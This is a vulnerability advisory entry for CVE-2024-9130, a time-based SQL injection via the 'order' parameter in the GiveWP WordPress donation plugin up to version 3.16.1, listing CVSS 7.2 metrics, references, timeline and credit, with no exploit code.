SQL Injection Vulnerability in GiveWP's Donation Plugin
CVE-2024-9130

7.2HIGH

Key Information:

Vendor: Webdevmattcrom
Status: GiveWP – Donation Plugin And Fundraising Platform
Vendor: CVE Published:; 27 September 2024

Summary

The GiveWP Donation Plugin for WordPress is exposed to a time-based SQL Injection vulnerability via the 'order' parameter in all versions up to and including 3.16.1. This vulnerability arises from insufficient data escaping and lack of proper preparation in existing SQL queries, enabling authenticated users with Manager-level access and above to inject additional malicious SQL commands. These actions can result in unauthorized access to sensitive information stored in the database, particularly in Legacy View mode, potentially jeopardizing user data and the integrity of the application.

Affected Version(s)

GiveWP – Donation Plugin and Fundraising Platform * <= 3.16.1

References

https://www.wordfence.com/threat-intel/vulnerabilities/id...

https://wordpress.org/plugins/give/#developers

https://plugins.trac.wordpress.org/browser/give/tags/3.16...

CVSS V3.1

Score:

7.2

Severity:

HIGH

Confidentiality:

High

Integrity:

High

Availability:

High

Attack Vector:

Network

Attack Complexity:

Low

Privileges Required:

High

User Interaction:

None

Scope:

Unchanged

Timeline

Vulnerability published
Sep 27, 2024
Vulnerability Reserved
Sep 23, 2024

Credit

Leo Trinh